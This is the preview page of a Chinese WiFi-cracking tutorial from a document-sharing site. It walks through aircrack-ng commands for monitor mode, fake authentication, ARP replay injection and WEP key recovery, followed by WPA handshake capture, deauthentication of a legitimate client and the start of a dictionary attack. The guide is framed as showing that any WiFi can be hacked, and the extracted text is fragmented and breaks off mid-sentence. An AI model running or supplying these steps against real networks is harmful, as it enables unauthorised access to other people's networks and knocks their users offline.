全民黑客系列——沒有黑不了的WIFI_第1頁
全民黑客系列——沒有黑不了的WIFI_第2頁
全民黑客系列——沒有黑不了的WIFI_第3頁
全民黑客系列——沒有黑不了的WIFI_第4頁
全民黑客系列——沒有黑不了的WIFI_第5頁
已閱讀5頁,還剩25頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

1、 全民黑客系列沒有黑不了的WIFIl 引言:隨著信息時代漸漸向我們走來,我們的生活也變得越來越加的便利,從電話到手機,從有線到無線.#buluabuluabuluabulua#省略三千字# 今天的教程是教大家如何初步攻擊wifi,即破解wifi密碼。高級攻擊方式后續(xù)會有文章(心情好就有),敬請關(guān)注。工具準(zhǔn)備:本次的操作平臺是Linux OS ,一個支持monitor模式的網(wǎng)卡電腦。Aircrackng無線攻擊套件。 1. 準(zhǔn)備工作網(wǎng)卡首先,你得有一個支持monitor模式的網(wǎng)卡(內(nèi)置的,外接的均可),如果支持packet injection更好。檢查網(wǎng)卡是否支持monitor模式,可

2、以用以下命令。(在這里假定你的操作系統(tǒng)是Linux并且安裝好相應(yīng)程序,如果沒有,請看后面教程) iwconfig  這個時候,屏幕上會顯示你的無線接口。 lo           no wireless extensions.eth0       no wireless extensions.wlan0     IEEE 802.11bg  ESSID:of

3、f/any              Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm              Retry  long limit:7   R

4、TS thr:off   Fragment thr:off              Encryption key:off              Power Management:on wlan0 即是我們所用網(wǎng)卡的接口。輸入以下命令開啟monitor模式: iwconfig

5、 wlan0 mode monitor; iwconfig  如果成功,屏幕上會顯示wlan0已經(jīng)是運行在monitor模式下。 lo           no wireless extensions.eth0       no wireless extensions.wlan0     IEEE 802.11bg&#

6、160; Mode:Monitor  Tx-Power=0 dBm              Retry  long limit:7   RTS thr:off   Fragment thr:off            

7、0; Power Management:on  測試網(wǎng)卡是否支持數(shù)據(jù)包注入(Packet Injection),可以參考這個說明 這里有一個很詳細的網(wǎng)卡介紹,大家可以參考。  操作系統(tǒng)(OS)由于大多數(shù)網(wǎng)卡的Windows驅(qū)動不支持monitor模式并且多數(shù)黑客工具都只有Linux版(或者有Windows版,但是功能跟Linux版本相比很弱),建議大家都是用Linux。如果對Linux不熟悉的話,請自行Google各種教程。Ubuntu是一個很好用(易用)的Linux發(fā)行版,你可以選用它。但是在這里,我推薦大家使用Kali&

8、#160;Linux來玩破解。Kali是一個專門針對安全實驗和入侵檢測的Linux發(fā)行版。它集成了幾乎所有我們破解WEP/WPA密碼所需要用到工 具。(如果你用Ubuntu,你可以學(xué)習(xí)如何安裝這些工具)你可以從Kali的Homepage上下載最新版本的Kali。你可以安裝它,創(chuàng)建Live CD,用虛擬機玩等等。  驅(qū)動跟工具 某些網(wǎng)卡支持Injection,但是驅(qū)動并不支持。如果沒有通過之前提到的Injection test,可以試著參考這個教程給網(wǎng)卡驅(qū)動打個補丁。在本文中,我們最主要用到的工具是aircrack-ng。 Aircrack-ng是一個 802.11

9、 WEP/WPA-PSK密碼破解工具包. 它包含了許多工具比如airodump-ng,aireplay-ng。我會在后文的實例中進行介紹。如果你用BackTrack,Aircrack- ng工具已經(jīng)安裝好了。如果你是使用其他Linux發(fā)行版,參考這個教程來安裝Aircrack-ng.我們可能會用到Kismet。Kismet是一個很棒的無線網(wǎng)絡(luò)抓包工具。由于篇幅關(guān)系,我就不在這里進行詳細介紹了。大家可以前往Kismet的homepage進行了解。這里還有一個關(guān)于Kismet的教程。另外,如果你的顯卡夠牛逼,在破解WPA密碼的時候,你可以使用pyrit來加速破解。它的homepage同樣有很好的教

10、程。 2. 破解WEP密碼現(xiàn)在進入正題。首先要說的是:WEP is weak。由于WEP在每個數(shù)據(jù)包中都加入一個24-bit的被稱作Initalization Vector(IV)的向量,所以我們?nèi)绻軌虿东@足夠的IV,破解的難度將會大打降低。不過簡單的被動式捕獲很難在短時間內(nèi)捕獲足夠的IV,我們這個時 候?qū)⑹褂肐njection技術(shù)來加速這一個過程。Injection的遠離是往無線網(wǎng)中發(fā)送大量的假數(shù)據(jù)包,從而產(chǎn)生大量的IV。現(xiàn)在,我會一步一步詳細的介紹如何來破解WEP密碼。首先,你需要記錄一下這些信息(有一些信息你可以從后文中了解如何獲?。?。· MAC address o

11、f wirless card (我的網(wǎng)卡MAC地址是00:0E:3B:1E:2F:71)· BSSID ?(目標(biāo)接入點Access Point的MAC地址,是C0:C1:C0:01:81:2D)· ESSID (無線網(wǎng)名稱,這里是“hackme”)· Access point channel (無線網(wǎng)絡(luò)信道,我這里是6)· Wireless interface (無線網(wǎng)接口,wlan0,開啟monitor模式之后是mon0)我這里使用的是BackTrack R2(將就著看吧,道理都一樣)的VMware鏡像,你可以從它的官方網(wǎng)站下載。下載好之后,用VMwa

12、re Player打開,選擇“I copied it”。  接下來BackTrack啟動。使用用戶名”root”以及密碼”toor”登錄。如果你是用的Live CD,不需要輸入用戶名密碼。輸入startx進入圖形界面。OK,接下來做一些例行測試,如果你已經(jīng)做過了,可以跳過。打開一個控制臺窗口(Konsole)輸入ifconfig -a來查看所有的網(wǎng)絡(luò)接口,如果你的網(wǎng)卡被正常識別,可以從這里看到你的網(wǎng)卡MAC地址。(wlan0)就是我的網(wǎng)卡。接下來,輸入iwconfig來查看所有無線網(wǎng)接口。接下來,用airmon-ng來嘗試打開monitor模式。 airmon-n

13、g start wlan0 6 這條命令中,wlan0參數(shù)是我們的無線網(wǎng)卡接口,6是我們要監(jiān)聽的信道。這里我們必須把監(jiān)聽的信道設(shè)成我們所要破解 Access Point的信道,否則無法破解成功。(關(guān)于如何查看AP的信道,可以用后文中的aireplay-ng的-9參數(shù))。如果成功開啟monitor模式, 屏幕將顯示如下信息。(注意,monitor的接口是?mon0而不是wlan0)。如果airmon-ng報告可能有其他進程會引起沖突,你可以用kill PID'來干掉那些進程。下一步是Injection測試,當(dāng)然如果已經(jīng)做過,也可以跳過。 

14、aireplay-ng -9 mon0  參數(shù)-9表示injection test mode,而mon0是monitor接口名。輸入aireplay-ng可以看到詳細的使用說明。(這個工具很強大,我們之后還會用到,建議大家讀讀說明) 當(dāng)然也可以指定一個AP。 aireplay-ng -9 -e hackme mon0 接下來我們使用airodump-ng來捕獲IV.airodump-ng -c 6 -bssid C0:C1:C0:01:81:2D

15、 -w output mon0 -c 6 表示信道。 -bssid C0:C1:C0:01:81:2D 是AP的MAC地址。-w capture 捕獲的包的文件名前綴。當(dāng)開始捕獲,屏幕會顯示如下信息。接下來我們又要用到aireplay-ng。這一次,我們用它來做一個假驗證把自己的網(wǎng)卡接口接入到AP。開啟另外一個控制臺(讓airodump-ng繼續(xù)抓包),輸入:aireplay-ng -1 0 -e hackme -a C0:C1:C0:01:81:2D&#

16、160;-h 00:0E:3B:1E:2F:71 mon0 -1表示偽造驗證。參數(shù)是重新驗證的時間(0秒)。-e hackme是無線網(wǎng)的名稱??吹竭@個畫面,就說明接入成功了。接下來,我們用aireplay-ng來進行Replay攻擊。aireplay-ng -3 -b C0:C1:C0:01:81:2D -h 00:0E:3B:1E:2F:71 mon0 當(dāng)開始運行,aireplay-ng會捕獲ARP請求,并不停的會放。如果你像我一樣只是做實驗(不是在真正的網(wǎng)絡(luò)環(huán)境中),可能會出現(xiàn)以下的畫面。注

17、意到了么,捕獲到 0 ARP requests和 0 ACKs。這是因為這個無線網(wǎng)沒有任何的Traffic?,F(xiàn)在我用另外一臺電腦接入無線網(wǎng),并且ping隨便什么IP。這會讓aireplay-ng捕獲到ARP請求,從而開始Replay attack!當(dāng)我們切換到airodump-ng的屏幕,我們也能發(fā)現(xiàn),數(shù)據(jù)在暴漲!”#/s”的意思就是每秒捕獲多少個包(IVs)。不過這個速度取決與很多因素,如果是運行在虛擬機里面,速度可能會很慢。正常情況下,速度一般在200-400左右。20分鐘之后,我們已經(jīng)捕獲到327531個數(shù)據(jù)包。這么多IV已經(jīng)足夠我們破解WEP密碼了。接下來,我們開始破解WEP密碼。ai

18、rcrack-ng -b C0:C1:C0:01:81:2D output*.cap 很快,密碼就宣告破解了。hackme的密碼是ABCDE54321(誰設(shè)的密碼這么簡單???)當(dāng)然,我們還可以用FMS/Korek方式來破解。aircrack-ng -K -b C0:C1:C0:01:81:2D output*.cap 參數(shù)-K就是使用Korek的意思。最后,測試一下是否這個密碼是有效的,我們用這個密碼來連這個網(wǎng)絡(luò)。用這組命令:ifconfig wlan0iwconfig wlan0&#

19、160;essid NETWORK_ID key WIRELESS_KEYdhclient wlan0 如果能連上,說明密碼正確,破解成功!3. 破解WPA/WPA2密碼 這里我簡單的介紹一下如何破解WPA密碼。WPA是一種比WEP高級的無線網(wǎng)標(biāo)準(zhǔn)。它避免了再數(shù)據(jù)包中嵌入IV。坦率的說,破解WPA的成功率不是 很大,而且耗費的時間相當(dāng)長。破解WPA密碼的基本原理是,當(dāng)一個合法用戶連接Access Point是,會產(chǎn)生一個四方認證的握手包,我們捕獲這個包,然后對其暴力破解。如果猜密的字典中有合法用戶設(shè)置的密碼,即可被破解。建議用戶在加密

20、時盡 可能使用無規(guī)律的字母與數(shù)字,以提高網(wǎng)絡(luò)的安全性。破解WPA密碼相對于破解WEP密碼有一個優(yōu)勢,就是我們捕獲了這個包之后可以離線破解,不容易被發(fā) 現(xiàn)。劣勢是,如果我們運氣不好,在我們捕獲的過程中,沒有合法登錄,我們就要偽裝成合法用戶對路由器進行攻擊,迫使合法用戶掉線重新連接,在此過程中獲得 一個有效的握手包。下面我依然用試驗中的例子來講解如何破解WPA密碼。首先,我假定你已經(jīng)做完之前的各項例行檢查程序。然后,我們開始用airodump抓包。需要注意的是,如果output前綴已經(jīng)有文件存在,airodump-ng會繼續(xù)往里面寫入。所以開始之前刪除之前的文件或者換一個前綴。Airodump-n

21、g開始抓包。你必須等到”WPA handshake: C0:C1:C0:01:81:2D”在屏幕的右上方出現(xiàn),即airodump-ng成功捕獲到握手包。現(xiàn)在我們用aireplay-ng來讓合法用戶掉線。aireplay-ng -0 1 -a C0:C1:C0:01:81:2D -c 00:0F:B5:FD:FB:C2 mon0 如果捕獲到數(shù)據(jù)包,按下 Ctrl+C 來讓airodump-ng停止抓包。現(xiàn)在可以離線暴力破解了。在破解之前,我們需要準(zhǔn)備暴力破解的字典。Aircrack-ng有一篇介紹如何獲取字典。它提供了兩個選擇,下載別人制作好的或者自己制作。如果是下載的話,這里有一些好東東。如果你想自己生成字典,推薦使用crunch,你可以從它的homepage下載。不幸的是,它的主頁壓根就沒什么介紹(至少目前是),你需要讀源代碼來了解它是怎么工作的。 (P.S. 我找到一個介紹crunch命令的網(wǎng)頁,或許會有些幫助)接下來,我們要用aircrack-ng來破解WP

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論